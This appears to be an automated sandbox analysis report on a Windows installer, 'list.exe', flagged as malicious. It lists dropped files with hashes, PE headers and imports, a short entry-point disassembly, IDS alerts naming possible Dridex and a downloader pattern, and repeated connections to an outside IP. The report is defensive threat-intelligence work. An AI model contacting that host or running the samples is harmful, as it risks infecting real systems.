                                                                                                                                      SHA-512:1F901F98FA687FFA86D2B07FC9D0123444889D4BC4C1C2AD29E2F3750D3F7DAB3CEB87ED8FA4F62BB8E063234699EE2ACB39416418A188499ABA5DB301D10531
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                      Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................~........................@..............................................@...............................%..................................................................................................................CODE.....}.......~.................. ..`DATA................................@...BSS......................................idata...%.......&..................@....tls.....................................rdata..............................@..P.reloc....... ......................@..P.rsrc...............................@..P.....................T..............@..P........................................................................................................................................
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2560
                                                                                                                                      Entropy (8bit):2.8818118453929262
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
                                                                                                                                      MD5:A69559718AB506675E907FE49DEB71E9
                                                                                                                                      SHA1:BC8F404FFDB1960B50C12FF9413C893B56F2E36F
                                                                                                                                      SHA-256:2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
                                                                                                                                      SHA-512:E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp
                                                                                                                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):6144
                                                                                                                                      Entropy (8bit):4.289297026665552
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:Sv1LfWvPcXegCPUo1vlZQrAxoONfHFZONfH3d1xCWMBFNL2pGSS4k+bkg6j0KHc:wfkcXegaJ/ZAYNzcld1xaX12pfSKvkc
                                                                                                                                      MD5:C8871EFD8AF2CF4D9D42D1FF8FADBF89
                                                                                                                                      SHA1:D0EACD5322C036554D509C7566F0BCC7607209BD
                                                                                                                                      SHA-256:E4FC574A01B272C2D0AED0EC813F6D75212E2A15A5F5C417129DD65D69768F40
                                                                                                                                      SHA-512:2735BB610060F749E26ACD86F2DF2B8A05F2BDD3DCCF3E4B2946EBB21BA0805FB492C474B1EEB2C5B8BF1A421F7C1B8728245F649C644F4A9ECC5BD8770A16F6
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....HP..........#............................@.............................`..............................................................<!.......P.......@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc........P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):23312
                                                                                                                                      Entropy (8bit):4.596242908851566
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
                                                                                                                                      MD5:92DC6EF532FBB4A5C3201469A5B5EB63
                                                                                                                                      SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
                                                                                                                                      SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
                                                                                                                                      SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      Process:C:\Users\user\Desktop\list.exe
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:modified
                                                                                                                                      Size (bytes):706560
                                                                                                                                      Entropy (8bit):6.506373118469941
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:RTPcYn5c/rPx37/zHBA6a5UeYpthr1CERAgrNuR+cIq5MRxyF:xPcYn5c/rPx37/zHBA6pFptZ1CEhqMRU
                                                                                                                                      MD5:048F12CF9C44FE7D997B30F23A9A2228
                                                                                                                                      SHA1:69949E9892B85A52869EE2F87BF09B19B4F1496B
                                                                                                                                      SHA-256:B3724BBFDF84CAAD3D390F27EF5EB513909BBF5389900BEFF465332317E56AAB
                                                                                                                                      SHA-512:5836BB02DB7F5DDB24823566B11324DAF657B32CC4AFB36BC8920F4874EB68C2C0A3964FCCA6E59423C5911F0907906C91217F3D132788AB41E50D53443CAAED
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................~........................@..............................................@...............................%..................................................................................................................CODE.....}.......~.................. ..`DATA................................@...BSS......................................idata...%.......&..................@....tls.....................................rdata..............................@..P.reloc....... ......................@..P.rsrc...............................@..P.....................T..............@..P........................................................................................................................................
                                                                                                                                      Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                      Category:modified
                                                                                                                                      Size (bytes):2464
                                                                                                                                      Entropy (8bit):3.2438748051583297
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:QOaqdmuF3rle+kWReHgHttUKlDENh+pyMySn6tUKlDENh+pyMySwwIPVxcwIPVxB:FaqdF7Q+AAHdKoqKFxcxkFQ
                                                                                                                                      MD5:4E9FC410B5A5842283AC62CA5D8AC9A4
                                                                                                                                      SHA1:8D4901B6E35A91D3172D7DCCBBA27502255C5C15
                                                                                                                                      SHA-256:8B4D98B39EF844C43DBE6E135E8CEE088A7B9D4A13DDFA01863A6280CDFA239E
                                                                                                                                      SHA-512:A9393022B5EDDE5D2E3A68E1DD5C751C26E0CBD50BD22A7F3EBEB2CA44875DC67CF02BD6663ECB01EA32B4C25B1A718F760407A96C86F356007C3918CF943856
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. W.e.d. .. D.e.c. .. 1.8. .. 2.0.2.4. .0.9.:.4.7.:.5.7.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*. .W.S.C. .S.t.a.t.e. .I.n.f.o. .*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.....*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*. .A.n.t.i.V.i.r.u.s.P.r.o.d.u.c.t. .*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.....d.i.s.p.l.a.y.N.a.m.e. .=. .[.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.].....p.a.t.h.T.o.S.i.g.n.e.d.P.r.o.d.u.c.t.E.x.e. .=. .[.w.i.n.d.o.w.s.d.
                                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Entropy (8bit):7.997854259362869
                                                                                                                                      TrID:
                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 98.73%
                                                                                                                                      • Inno Setup installer (109748/4) 1.08%
                                                                                                                                      • Windows Screen Saver (13104/52) 0.13%
                                                                                                                                      • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                      File name:list.exe
                                                                                                                                      File size:3'575'195 bytes
                                                                                                                                      MD5:8eabea9b74251fe67f24b87e54486643
                                                                                                                                      SHA1:b8549e3abe3828be7164e507414658df238c2652
                                                                                                                                      SHA256:ec252c14b60754a9e280e0e4624077fcc3af03347f1a585b539f8d100777ad22
                                                                                                                                      SHA512:679c2670888550d067c9b6c16c03a274a9aeacad39bd46696606e1b511969229d381ca411f46255d40dba82cf6e1a27d3a5a87722178dc555d3a0e57dd571b9d
                                                                                                                                      SSDEEP:49152:C9B1GnidpX+FpdIpo4aNG062AuX3T723CraiaSTR8ZKxgkgw5KM3xAQY77DvEbl5:MB1wwRmIkeuHG3CzTbekgw59MgpGQ5f9
                                                                                                                                      TLSH:15F5339121834679F6F209732C74C3B227BB6B1F59F86E6698DC4E48AF33258A241F45
                                                                                                                                      File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                                                                                      Icon Hash:2d2e3797b32b2b99
                                                                                                                                      Entrypoint:0x40a5f8
                                                                                                                                      Entrypoint Section:CODE
                                                                                                                                      Digitally signed:false
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      Subsystem:windows gui
                                                                                                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                                                      DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                      Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                                                                      TLS Callbacks:
                                                                                                                                      CLR (.Net) Version:
                                                                                                                                      OS Version Major:1
                                                                                                                                      OS Version Minor:0
                                                                                                                                      File Version Major:1
                                                                                                                                      File Version Minor:0
                                                                                                                                      Subsystem Version Major:1
                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                      Import Hash:884310b1928934402ea6fec1dbd3cf5e
                                                                                                                                      Instruction
                                                                                                                                      push ebp
                                                                                                                                      mov ebp, esp
                                                                                                                                      add esp, FFFFFFC4h
                                                                                                                                      push ebx
                                                                                                                                      push esi
                                                                                                                                      push edi
                                                                                                                                      xor eax, eax
                                                                                                                                      mov dword ptr [ebp-10h], eax
                                                                                                                                      mov dword ptr [ebp-24h], eax
                                                                                                                                      call 00007FEF691DC5F3h
                                                                                                                                      call 00007FEF691DD7FAh
                                                                                                                                      call 00007FEF691DDA89h
                                                                                                                                      call 00007FEF691DDB2Ch
                                                                                                                                      call 00007FEF691DFACBh
                                                                                                                                      call 00007FEF691E2436h
                                                                                                                                      call 00007FEF691E259Dh
                                                                                                                                      xor eax, eax
                                                                                                                                      push ebp
                                                                                                                                      push 0040ACC9h
                                                                                                                                      push dword ptr fs:[eax]
                                                                                                                                      mov dword ptr fs:[eax], esp
                                                                                                                                      xor edx, edx
                                                                                                                                      push ebp
                                                                                                                                      push 0040AC92h
                                                                                                                                      push dword ptr fs:[edx]
                                                                                                                                      mov dword ptr fs:[edx], esp
                                                                                                                                      mov eax, dword ptr [0040C014h]
                                                                                                                                      call 00007FEF691E304Bh
                                                                                                                                      call 00007FEF691E2C36h
                                                                                                                                      cmp byte ptr [0040B234h], 00000000h
                                                                                                                                      je 00007FEF691E3B2Eh
                                                                                                                                      call 00007FEF691E3148h
                                                                                                                                      xor eax, eax
                                                                                                                                      call 00007FEF691DD2E9h
                                                                                                                                      lea edx, dword ptr [ebp-10h]
                                                                                                                                      xor eax, eax
                                                                                                                                      call 00007FEF691E00DBh
                                                                                                                                      mov edx, dword ptr [ebp-10h]
                                                                                                                                      mov eax, 0040CE28h
                                                                                                                                      call 00007FEF691DC68Ah
                                                                                                                                      push 00000002h
                                                                                                                                      push 00000000h
                                                                                                                                      push 00000001h
                                                                                                                                      mov ecx, dword ptr [0040CE28h]
                                                                                                                                      mov dl, 01h
                                                                                                                                      mov eax, 0040738Ch
                                                                                                                                      call 00007FEF691E096Ah
                                                                                                                                      mov dword ptr [0040CE2Ch], eax
                                                                                                                                      xor edx, edx
                                                                                                                                      push ebp
                                                                                                                                      push 0040AC4Ah
                                                                                                                                      push dword ptr fs:[edx]
                                                                                                                                      mov dword ptr fs:[edx], esp
                                                                                                                                      call 00007FEF691E30A6h
                                                                                                                                      mov dword ptr [0040CE34h], eax
                                                                                                                                      mov eax, dword ptr [0040CE34h]
                                                                                                                                      cmp dword ptr [eax+0Ch], 00000000h
                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xd0000x950.idata
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x110000x2c00.rsrc
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0xf0000x18.rdata
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                      CODE0x10000x9d300x9e00c3bd95c4b1a8e5199981e0d9b45fd18cFalse0.6052709651898734data6.631765876950794IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                      DATA0xb0000x2500x4001ee71d84f1c77af85f1f5c278f880572False0.306640625data2.751820662285145IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                      BSS0xc0000xe8c0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                      .idata0xd0000x9500xa00bb5485bf968b970e5ea81292af2acdbaFalse0.414453125data4.430733069799036IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                      .tls0xe0000x80x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                      .rdata0xf0000x180x2009ba824905bf9c7922b6fc87a38b74366False0.052734375data0.2044881574398449IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                                                      .reloc0x100000x8c40x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                                                      .rsrc0x110000x2c000x2c00584d947bd36e14a84b7a6ffefbd7c61eFalse0.32652698863636365data4.497568748493399IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                      RT_ICON0x113540x128Device independent bitmap graphic, 16 x 32 x 4, image size 192DutchNetherlands0.5675675675675675
                                                                                                                                      RT_ICON0x1147c0x568Device independent bitmap graphic, 16 x 32 x 8, image size 320DutchNetherlands0.4486994219653179
                                                                                                                                      RT_ICON0x119e40x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640DutchNetherlands0.4637096774193548
                                                                                                                                      RT_ICON0x11ccc0x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152DutchNetherlands0.3935018050541516
                                                                                                                                      RT_STRING0x125740x2f2data0.35543766578249336
                                                                                                                                      RT_STRING0x128680x30cdata0.3871794871794872
                                                                                                                                      RT_STRING0x12b740x2cedata0.42618384401114207
                                                                                                                                      RT_STRING0x12e440x68data0.75
                                                                                                                                      RT_STRING0x12eac0xb4data0.6277777777777778
                                                                                                                                      RT_STRING0x12f600xaedata0.5344827586206896
                                                                                                                                      RT_RCDATA0x130100x2cdata1.1818181818181819
                                                                                                                                      RT_GROUP_ICON0x1303c0x3edataEnglishUnited States0.8387096774193549
                                                                                                                                      RT_VERSION0x1307c0x4f4dataEnglishUnited States0.26735015772870663
                                                                                                                                      RT_MANIFEST0x135700x5a4XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.42590027700831024
                                                                                                                                      DLLImport
                                                                                                                                      kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, WideCharToMultiByte, TlsSetValue, TlsGetValue, MultiByteToWideChar, GetModuleHandleA, GetLastError, GetCommandLineA, WriteFile, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetSystemTime, GetFileType, ExitProcess, CreateFileA, CloseHandle
                                                                                                                                      user32.dllMessageBoxA
                                                                                                                                      oleaut32.dllVariantChangeTypeEx, VariantCopyInd, VariantClear, SysStringLen, SysAllocStringLen
                                                                                                                                      advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA
                                                                                                                                      kernel32.dllWriteFile, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, Sleep, SizeofResource, SetLastError, SetFilePointer, SetErrorMode, SetEndOfFile, RemoveDirectoryA, ReadFile, LockResource, LoadResource, LoadLibraryA, IsDBCSLeadByte, GetWindowsDirectoryA, GetVersionExA, GetUserDefaultLangID, GetSystemInfo, GetSystemDefaultLCID, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeProcess, GetEnvironmentVariableA, GetCurrentProcess, GetCommandLineA, GetACP, InterlockedExchange, FormatMessageA, FindResourceA, DeleteFileA, CreateProcessA, CreateFileA, CreateDirectoryA, CloseHandle
                                                                                                                                      user32.dllTranslateMessage, SetWindowLongA, PeekMessageA, MsgWaitForMultipleObjects, MessageBoxA, LoadStringA, ExitWindowsEx, DispatchMessageA, DestroyWindow, CreateWindowExA, CallWindowProcA, CharPrevA
                                                                                                                                      comctl32.dllInitCommonControls
                                                                                                                                      advapi32.dllAdjustTokenPrivileges
                                                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                                                      DutchNetherlands
                                                                                                                                      EnglishUnited States
                                                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                      2024-12-18T14:00:02.379653+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.749795188.119.66.185443TCP
                                                                                                                                      2024-12-18T14:00:03.416230+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749795188.119.66.185443TCP
                                                                                                                                      2024-12-18T14:00:05.316086+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.749804188.119.66.185443TCP
                                                                                                                                      2024-12-18T14:00:06.413497+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749804188.119.66.185443TCP
                                                                                                                                      2024-12-18T14:00:08.584340+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.749813188.119.66.185443TCP
                                                                                                                                      2024-12-18T14:00:09.530883+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749813188.119.66.185443TCP
                                                                                                                                      2024-12-18T14:00:11.311309+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.749819188.119.66.185443TCP
                                                                                                                                      2024-12-18T14:00:11.997868+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749819188.119.66.185443TCP
                                                                                                                                      2024-12-18T14:00:13.882631+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.749824188.119.66.185443TCP
                                                                                                                                      2024-12-18T14:00:14.654720+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749824188.119.66.185443TCP
                                                                                                                                      2024-12-18T14:00:16.573601+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.749832188.119.66.185443TCP
                                                                                                                                      2024-12-18T14:00:17.561270+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749832188.119.66.185443TCP
                                                                                                                                      2024-12-18T14:00:19.325465+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.749838188.119.66.185443TCP
                                                                                                                                      2024-12-18T14:00:20.002065+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749838188.119.66.185443TCP
                                                                                                                                      2024-12-18T14:00:21.766157+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.749843188.119.66.185443TCP
                                                                                                                                      2024-12-18T14:00:22.466431+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749843188.119.66.185443TCP
                                                                                                                                      2024-12-18T14:00:24.333991+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.749848188.119.66.185443TCP
                                                                                                                                      2024-12-18T14:00:25.371903+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749848188.119.66.185443TCP
                                                                                                                                      2024-12-18T14:00:26.975544+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.749853188.119.66.185443TCP
                                                                                                                                      2024-12-18T14:00:27.925819+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749853188.119.66.185443TCP
                                                                                                                                      2024-12-18T14:00:29.909378+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.749860188.119.66.185443TCP
                                                                                                                                      2024-12-18T14:00:30.743519+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749860188.119.66.185443TCP
                                                                                                                                      2024-12-18T14:00:32.931169+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.749868188.119.66.185443TCP
                                                                                                                                      2024-12-18T14:00:34.040700+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749868188.119.66.185443TCP
                                                                                                                                      2024-12-18T14:00:35.935185+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.749875188.119.66.185443TCP
                                                                                                                                      2024-12-18T14:00:36.956646+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749875188.119.66.185443TCP
                                                                                                                                      2024-12-18T14:00:38.547635+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.749885188.119.66.185443TCP
                                                                                                                                      2024-12-18T14:00:39.269197+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749885188.119.66.185443TCP
                                                                                                                                      2024-12-18T14:00:40.992337+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.749891188.119.66.185443TCP
                                                                                                                                      2024-12-18T14:00:41.670874+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749891188.119.66.185443TCP
                                                                                                                                      2024-12-18T14:00:43.262705+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.749897188.119.66.185443TCP
                                                                                                                                      2024-12-18T14:00:44.007513+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749897188.119.66.185443TCP
                                                                                                                                      2024-12-18T14:00:45.771653+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.749903188.119.66.185443TCP
                                                                                                                                      2024-12-18T14:00:46.503947+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749903188.119.66.185443TCP
                                                                                                                                      2024-12-18T14:00:48.542708+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.749909188.119.66.185443TCP
                                                                                                                                      2024-12-18T14:00:49.475698+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749909188.119.66.185443TCP
                                                                                                                                      2024-12-18T14:00:51.173700+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.749915188.119.66.185443TCP
                                                                                                                                      2024-12-18T14:00:52.086221+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749915188.119.66.185443TCP
                                                                                                                                      2024-12-18T14:00:53.662666+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.749922188.119.66.185443TCP
                                                                                                                                      2024-12-18T14:00:54.349196+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749922188.119.66.185443TCP
                                                                                                                                      2024-12-18T14:00:56.041453+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.749928188.119.66.185443TCP
                                                                                                                                      2024-12-18T14:00:56.735721+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749928188.119.66.185443TCP
                                                                                                                                      2024-12-18T14:00:58.823131+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.749934188.119.66.185443TCP
                                                                                                                                      2024-12-18T14:00:59.849002+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749934188.119.66.185443TCP
                                                                                                                                      2024-12-18T14:01:01.592108+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.749944188.119.66.185443TCP
                                                                                                                                      2024-12-18T14:01:02.555588+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749944188.119.66.185443TCP
                                                                                                                                      2024-12-18T14:01:04.322674+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.749950188.119.66.185443TCP
                                                                                                                                      2024-12-18T14:01:05.207393+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749950188.119.66.185443TCP
                                                                                                                                      2024-12-18T14:01:07.308660+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.749956188.119.66.185443TCP
                                                                                                                                      2024-12-18T14:01:08.431803+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749956188.119.66.185443TCP
                                                                                                                                      2024-12-18T14:01:10.190420+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.749967188.119.66.185443TCP
                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                      Dec 18, 2024 14:00:00.406585932 CET49795443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:00.406620026 CET44349795188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:00.406699896 CET49795443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:00.416366100 CET49795443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:00.416382074 CET44349795188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:02.379503012 CET44349795188.119.66.185192.168.2.7
